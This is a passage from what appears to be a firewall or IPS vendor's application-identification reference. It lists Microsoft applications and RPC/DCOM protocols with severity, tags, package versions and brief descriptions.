Description: Microsoft Certificate Services Remote Administration Protocol consists of a set of Distributed Component Object Model (DCOM) interfaces, as specified in [MS-DCOM], that allow administrative tools to configure the state and policy of a certification authority (CA) on a server. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Clarity

About this situation: Microsoft Clarity usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1769-5242
Description: Clarity is a free, easy-to-use tool that captures how real people actually use your site.
Back to top

Microsoft-ClusAPI-Protocol

About this situation: Microsoft ClusAPI Protocol usage
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Failover Cluster: Management API (ClusAPI) Protocol is a remote procedure call (RPC)-based protocol that is used for remotely managing a failover cluster. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Defender-For-Endpoint

About this situation: Microsoft Defender for Endpoint usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1741-5242
Last changed: sgpkg-ips-1742-5242
Description: Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.
Back to top

Microsoft-Delve

About this situation: Microsoft Delve usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-1300-5242
Last changed: sgpkg-ips-1769-5242
Description: Microsoft Delve provides a view into the contents in Office 365 that is uniquely tailored for each user.
Back to top

Microsoft-Developer-Network

About this situation: Microsoft Developer Network usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-600-5211
Description: Microsoft Developer Network usage has been detected.
Back to top

Microsoft-DHCP-Server-Management-Protocol

About this situation: Microsoft DHCP Server Management Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft DHCP (Dynamic Host Configuration Protocol) Server Management Protocol (DHCPM) defines remote procedure call (RPC) interfaces that provide methods for remotely accessing and administering the DHCP server. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Disk-Management-Remote-Protocol

About this situation: Microsoft Disk Management Remote Protocol
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Disk Management Remote Protocol is a set of Distributed Component Object Model (DCOM) interfaces, built for managing storage objects on a machine, such as disks and volumes. The protocol also enables clients to obtain notifications of changes to storage objects. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Distributed-File-System-Management-Protocol

About this situation: Microsoft Distributed File System Management Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Distributed File System (DFS): Namespace Management Protocol provides a remote procedure call (RPC) interface for administering DFS configurations. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Distributed-File-System-Replication-Helper-Protocol

About this situation: Microsoft Distributed File System Replication Helper Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Distributed File System: Replication Helper (DFS-R Helper) Protocol is a set of DCOM interfaces for configuring and monitoring the Distributed File System. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Distributed-File-System-Replication-Protocol

About this situation: Microsoft Distributed File System Replication Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Distributed File System: Replication (DFS-R) Protocol is a remote procedure call (RPC) interface that replicates files between servers. DFS-R enables creation of multimaster optimistic file replication systems. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-DLT-Central-Manager-Protocol

About this situation: Microsoft DLT Central Manager Protocol usage
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Distributed Link Tracking (DLT) consists of two RPC-based protocols that work together to discover the new location of a file that has moved. DLT Central Manager Protocol keeps track of file and volume moves as well as other relevant information from participating computers so it can provide this information in response to workstation queries. In addition to DLT Central Manager Protocol, DLT includes the DLT Workstation Protocol, which is used to determine a file's current location. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-DLT-Workstation-Protocol

About this situation: Microsoft DLT Workstation Protocol usage
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Distributed Link Tracking (DLT) consists of two RPC-based protocols that work together to discover the new location of a file that has moved. DLT Central Manager Protocol keeps track of file and volume moves as well as other relevant information from participating computers so it can provide this information in response to workstation queries. In addition to DLT Central Manager Protocol, DLT includes the DLT Workstation Protocol, which is used to determine a file's current location. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-DNS-Server-Management-Protocol

About this situation: Microsoft DNS Server Management Protocol
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Domain Name Service (DNS ) Server Management Protocol defines RPC interfaces that provide methods for remotely accessing and administering a DNS server. It is a client/server protocol based on RPC that can be used in the configuration, management, and monitoring of a DNS server. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Dynamics-CRM

About this situation: Microsoft Dynamics CRM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1300-5242
Description: Microsoft Dynamics CRM is a XRM platform and uses its proprietary (.NET based) framework to customize it to meet many different demands. Microsoft Dynamics CRM comes in 2011 version for cloud offering and installation by a partner/customer. New feature set includes: Visualizations, Dashboards, Document Management, Grid Filters, Dialogs, Recurring Appointments, Custom Activities, Goal Management, Fetch based Reports, MAPI based Outlook clients, FLS etc. Source: Wikipedia
Back to top

Microsoft-Encrypting-File-System-Remote-Protocol

About this situation: Microsoft Encrypting File System Remote Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Encrypting File System Remote (EFSRPC) Protocol is used for performing maintenance and management operations on encrypted data that is stored remotely and accessed over a network. It is used in Windows to manage files that reside on remote file servers and are encrypted using the Encrypting File System (EFS). Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-EventLog-Remoting-Protocol

About this situation: Microsoft EventLog Remoting Protocol usage
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft EventLog Remoting Protocol is an RPC-based protocol that exposes remote procedure call (RPC) methods for reading events in both live event logs and backup event logs on remote computers. The protocol also specifies how to get general information on a log, such as the number of records in the log, the oldest records in the log, and if the log is full. The protocol may also be used for clearing and backing up both types of event logs. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Exchange

About this situation: Microsoft Exchange MSRPC traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-1190-5242
Description: Microsoft Exchange Server is a calendaring software, a mail server and contact manager developed by Microsoft. Source: Wikipedia. Currently this application can only be used for identifying Microsoft Exchange traffic, but it cannot be effectively used for controlling (i.e. terminating) the traffic. Due to technical reasons this application will not work with engines (FW/IPS) newer than 5.7.3.
Back to top

Microsoft-Exchange-ActiveSync

About this situation: Microsoft Exchange ActiveSync traffic detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-939-5242
Description: Microsoft Exchange ActiveSync is a protocol that allows synchronizing email, contacts, calendar, tasks and notes from a messaging server to a mobile device.
Back to top

Microsoft-File-Server-Remote-VSS-Protocol

About this situation: Microsoft File Server Remote VSS Protocol usage
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft File Server Remote VSS Protocol (FSRVP) is a remote procedure call (RPC)-based protocol that is used for creating shadow copies of file shares on a remote computer. This protocol facilitates the backup applications' tasks in performing application-consistent backup and restore of VSS-aware applications storing data on network file shares. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-File-Server-Resource-Manager-Protocol

About this situation: Microsoft File Server Resource Manager (FSRM) Protocol traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft File Server Resource Manager (FSRM) Protocol is a set of DCOM interfaces for managing the configuration of directory quotas, file screens, classification properties, classification rules, file management jobs, report jobs, classifier modules, and storage modules on a machine. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Firewall-And-Advanced-Security-Protocol

About this situation: Microsoft Firewall and Advanced Security Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Firewall and Advanced Security Protocol describes managing security policies on remote computers. The specific policies that this protocol manages are those of the firewall and advanced security components. The protocol allows the same functionality that is available locally; it can add, modify, delete, and enumerate policies. It can also enumerate security associations that can be generated between hosts after this policy is enforced. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Forms

About this situation: Microsoft Forms usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-1300-5242
Last changed: sgpkg-ips-1769-5242
Description: Microsoft Forms is an online questionare creation service in the Office 365 suite.
Back to top

Microsoft-IIS

About this situation: Microsoft IIS MSRPC traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1190-5242
Description: Microsoft Internet Information Services (IIS) is an extensible web server created by Microsoft for use with Windows NT family. Source: Wikipedia. This application can only be used for identifying Microsoft IIS traffic, but it cannot be effectively used for controlling (i.e. terminating) the traffic. Due to technical reasons this application will not work with engines (FW/IPS) newer than 5.7.3. Please use Microsoft-IIS(-Current) for 5.7.4 or higher engine version.
Back to top

Microsoft-Internet-Explorer-Gallery

About this situation: Microsoft Internet Explorer Gallery usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-625-5211
Description: Microsoft Internet Explorer Gallery usage was detected.
Back to top

Microsoft-Intune

About this situation: Microsoft Intune usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-1498-5242
Last changed: sgpkg-ips-1831-5242
Description: Microsoft Intune is a cloud-based service that focuses on mobile device management (MDM) and mobile application management (MAM).
Back to top

Microsoft-Kaizala

About this situation: Microsoft Kaizala usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-1300-5242
Last changed: sgpkg-ips-1769-5242
Description: Microsoft Kaizala is a secure chat service in the Office 365 suite.
Back to top

Microsoft-Key-Management-Service-Protocol

About this situation: Microsoft Key Management Service Protocol traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1805-5242
Last changed: sgpkg-ips-1805-5242
Description: KMS uses a client-server model to active Windows clients and is used for volume activation on your local network.
Back to top

Microsoft-Live-Remote-Event-Capture-Protocol

About this situation: Microsoft Live Remote Event Capture Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Live Remote Event Capture (LREC) Protocol allows a management station to monitor events on a target system across a network. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Local-Security-Authority-Remote-Protocol

About this situation: Microsoft Local Security Authority Remote Protocol
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Local Security Authority (Translation Methods) Remote Protocol is implemented in Windows products to translate identifiers for security principals between human-readable and machine-readable forms. This translation can be used in scenarios such as human management of resource access. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Login

About this situation: Microsoft Login usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1814-5242
Description: Microsoft Login services usage was detected.
Back to top

Microsoft-Mac-Update

About this situation: Microsoft Mac Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-625-5211
Description: Microsoft Mac Update usage has been detected.
Back to top

Microsoft-Media-Server

About this situation: Microsoft Media Server usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Media
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: Microsoft Media Server is Microsoft's proprietary network streaming protocol that is used to transfer unicast data in Windows Media Services.
Back to top

Microsoft-Messenger-Service-Remote-Protocol

About this situation: Microsoft Messenger Service Remote Protocol traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Messenger Service Remote Protocol is a set of remote procedure call (RPC) interfaces is used to receive and display short text messages to the console user and to manage the names for which a message server receives messages. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-MSMQ-Directory-Service-Protocol

About this situation: Microsoft MSMQ Directory Service Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Message Queuing (MSMQ): Directory Service Protocol is a remote procedure call (RPC)-based protocol that is used by a client to remotely access and maintain Message Queuing (MSMQ) objects in a directory service through an MSMQ Directory Service server. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-MSMQ-Queue-Manager-Client-Protocol

About this situation: Microsoft MSMQ Queue Manager Client Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Message Queuing (MSMQ): Queue Manager Client Protocol is an RPC-based protocol, which enables communication between an application and an MSMQ supporting server or a remote MSMQ queue manager. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-MSMQ-Queue-Manager-Management-Protocol

About this situation: Microsoft MSMQ Queue Manager Management Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Message Queuing (MSMQ): Queue Manager Management Protocol is a remote procedure call (RPC)-based protocol used for management operations on the MSMQ server, including monitoring the MSMQ installation and the queues. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-MSMQ-Queue-Manager-Remote-Read-Protocol

About this situation: Microsoft MSMQ Queue Manager Remote Read Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Message Queuing (MSMQ) Queue Manager Remote Read Protocol is a remote procedure call (RPC)-based protocol that is used by Microsoft Message Queuing (MSMQ) clients to read or reject a message from a queue, to move a message between queues, and to purge all messages from a queue. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-MSMQ-Queue-Manager-To-Queue-Manager-Protocol

About this situation: Microsoft MSMQ Queue Manager To Queue Manager Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Message Queuing (MSMQ): Queue Manager To Queue Manager Protocol is a remote procedure call (RPC)-based protocol used by the queue manager and runtime library to read and purge messages from a remote queue. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-MSN-Messenger

About this situation: Microsoft MSN Messenger traffic
Context: Application Context
Severity: 1
Tags: Protocols, Chat
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: Microsoft MSN Messenger usage.
Back to top

Microsoft-MyAnalytics

About this situation: Microsoft MyAnalytics usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-1300-5242
Last changed: sgpkg-ips-1769-5242
Description: Microsoft MyAnalytics provides productivity analytics for Office 365 users based on actions in the Office 365 suite.
Back to top

Microsoft-NCSI

About this situation: Microsoft Network Connectivity Status Indicator usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-508-5211
Last changed: sgpkg-ips-1695-5242
Description: Microsoft NCSI is used by modern Windowses (since Vista) to test network connectivity.
Back to top

Microsoft-Netlogon-Remote-Protocol

About this situation: Microsoft Netlogon Remote Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Netlogon Remote Protocol is a remote procedure call (RPC) interface that is used for user and machine authentication on domain-based networks. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Office-365

About this situation: Microsoft Office 365 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1814-5242
Description: Office 365, or O365, is a set of subscription based cloud services proviced by Microsoft. It includes services such as Outlook, OneDrive and Sharepoint. To allow Skype traffic, the network application Skype needs to be allowed as well.
Back to top

Microsoft-Office-Sway

About this situation: Office Sway usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-774-5211
Description: Office Sway is an online presentation service develped by Microsoft and it is a part of the Office application family.
Back to top

Microsoft-OneDrive

About this situation: Microsoft OneDrive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-1795-5242
Description: OneDrive (formerly SkyDrive or Windows Live SkyDrive) is a web-based online file storage and sharing service provided by Microsoft.
Back to top

Microsoft-OneNote

About this situation: Microsoft OneNote usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-1025-5242
Last changed: sgpkg-ips-1300-5242
Description: Microsoft OneNote is a collabration and document management software.
Back to top

Microsoft-Online-Certificate-Status-Service

About this situation: Microsoft Online Certificate Status service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1769-5242
Description: Online Certitificate Status Protocol (OCSP) is used to validate status of Extended Validation Certificates (EV certificates).
Back to top

Microsoft-Power-Automate

About this situation: Microsoft Power Automate usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-1300-5242
Last changed: sgpkg-ips-1769-5242
Description: Microsoft Power Automate, previously Microsoft Flow, is a cloud-based automation platform in the Office 365 suite.
Back to top

Microsoft-PowerApps

About this situation: Microsoft PowerApps usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-1300-5242
Last changed: sgpkg-ips-1769-5242
Description: Microsoft PowerApps is an application development platform in the Office 365 suite.
Back to top

Microsoft-Print-System-Asynchronous-Notification-Protocol

About this situation: Microsoft Print System Asynchronous Notification Protocol
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Print System Asynchronous Notification Protocol is based on the remote procedure call (RPC) protocol. It is designed to be used asynchronously by clients to receive print status notifications from a server and to send back responses to those notifications. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Print-System-Asynchronous-Remote-Protocol

About this situation: Microsoft Print System Asynchronous Remote Protocol
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Print System Asynchronous Remote Protocol supports printing and spooling operations between a client and a server, including print job control and print system management. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Print-System-Remote-Protocol

About this situation: Microsoft Print System Remote Protocol
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Print System Remote Protocol supports synchronous printing and spooling operations between a client and server, including print job control and print system management. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Project

About this situation: Microsoft Project usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-1300-5242
Last changed: sgpkg-ips-1769-5242
Description: Microsoft Project is a project management service in the Office 365 suite.
Back to top

Microsoft-Remote-Authorization-API-Protocol

About this situation: Microsoft Remote Authorization API Protocol
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Remote Authorization API Protocol is a Remote Procedure Call (RPC)-based protocol used to perform various authorization queries on remote computers. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Remote-Shutdown-Protocol

About this situation: Microsoft Remote Shutdown Protocol
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Remote Shutdown Protocol is a remote procedure call (RPC)-based protocol used to shut down or terminate shutdown on a remote computer. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Removable-Storage-Manager-Remote-Protocol

About this situation: Microsoft Removable Storage Manager Remote Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Removable Storage Manager (RSM) Remote Protocol is a set of distributed component object model (DCOM) interfaces for applications to manage roboticchangers, media libraries, and tape drives. The RSM Remote Protocol deals with detailed low-level operating system and storage concepts. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Routing-And-Remote-Access-Server-Management-Protocol

About this situation: Microsoft Routing And Remote Access Server Management Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft routing and remote access service (RRAS) server management protocol enables remote management (configuration and monitoring) of an RRAS implementation. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-SAM-Remote-Protocol

About this situation: Microsoft SAM Remote Protocol
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Security Account Manager (SAM) Remote Protocol (Client-to-Server) provides management functionality for an account store or directory containing users and groups. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Server-Service-Remote-Protocol

About this situation: Microsoft Server Service Remote Protocol
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Server Service Remote Protocol is a remote procedure call (RPC)-based protocol that is used for remotely enabling file and printer sharing and named pipe access to the server through the Server Message Block (SMB) Protocol. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Service-Control-Manager-Remote-Protocol

About this situation: Microsoft Service Control Manager Remote Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Service Control Manager Remote Protocol is a remote procedure call (RPC)-based client/server protocol that is used for remotely managing the Service Control Manager (SCM). The SCM is an RPC server that enables service configuration and control of service programs. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Service-Witness-Protocol

About this situation: Microsoft Service Witness Protocol
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Service Witness Protocol is a remote procedure call (RPC)-based protocol that is used to promptly notify a client of resource changes that have occurred on a highly available server. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Shadow-Copy-Management-Protocol

About this situation: Microsoft Shadow Copy Management Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Shadow Copy Management Protocol is used to programmatically enumerate shadow copies and configure shadow copy storage on remote machines. The protocol uses a set of Distributed Component Object Model (DCOM) interfaces to query shadow copies and manage shadow copy storage on a remote machine. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Sharepoint

About this situation: Microsoft Sharepoint usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-482-5211
Last changed: sgpkg-ips-1638-5242
Description: Microsoft Sharepoint is a collabration and document management software.
Back to top

Microsoft-SharePoint-Online

About this situation: Microsoft SharePoint Online usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-1300-5242
Last changed: sgpkg-ips-1769-5242
Description: Microsoft SharePoint is a collabration and document management software. SharePoint Online is the online version of SharePoint, integrated into the Microsoft Office 365 platform. The SharePoint Online service heavily utilizes the Microsoft OneDrive service, which is why SharePoint cannot be allowed without OneDrive being allowed as well, and vice versa.
Back to top

Microsoft-Silverlight

About this situation: Microsoft Silverlight usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-489-5211
Last changed: sgpkg-ips-628-5211
Description: Microsoft Silverlight is a web application framework that integrates multimedia, graphics, animations and interactivity into a single runtime environment.
Back to top

Microsoft-SmartScreen

About this situation: Microsoft SmartScreen usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1741-5242
Description: SmartScreen is a malware and phishing protection for various Microsoft products, including Internet Explorer.
Back to top

Microsoft-SQL-Server

About this situation: Microsoft SQL Server traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1190-5242
Description: Microsoft SQL Server usage.
Back to top

Microsoft-SQL-Server-UDP

About this situation: Microsoft SQL Server UDP traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1032-5242
Last changed: sgpkg-ips-1032-5242
Description: Microsoft SQL Server usage.
Back to top

Microsoft-Store

About this situation: Application Microsoft-Store detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: The Microsoft Store is a chain of retail stores and an online shopping site, owned and operated by Microsoft and dealing in computers, computer software and consumer electronics.
Back to top

Microsoft-Studios

About this situation: Microsoft Studios traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-788-5211
Last changed: sgpkg-ips-788-5211
Description: Microsoft Studios, previosly known as Microsoft Game Studios, is a branch of Microsoft that develops games primarily for Microsoft's own operating systems and gaming platforms.
Back to top

Microsoft-Task-Scheduler-Remoting-Protocol

About this situation: Microsoft Task Scheduler Remoting Protocol traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Task Scheduler Remoting Protocol is used for registering and configuring tasks and to inquire about the status of running tasks on a remote machine. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Teams

About this situation: Microsoft Teams usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-1300-5242
Last changed: sgpkg-ips-1758-5242
Description: Microsoft Teams is a collaboration platform by Microsoft.
Back to top

Microsoft-Technet

About this situation: Microsoft Technet usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1552-5242
Description: Microsoft-Technet usage detected
Back to top

Microsoft-Telemetry

About this situation: Microsoft Telemetry usage detected
Context: Application Context
Severity: 1
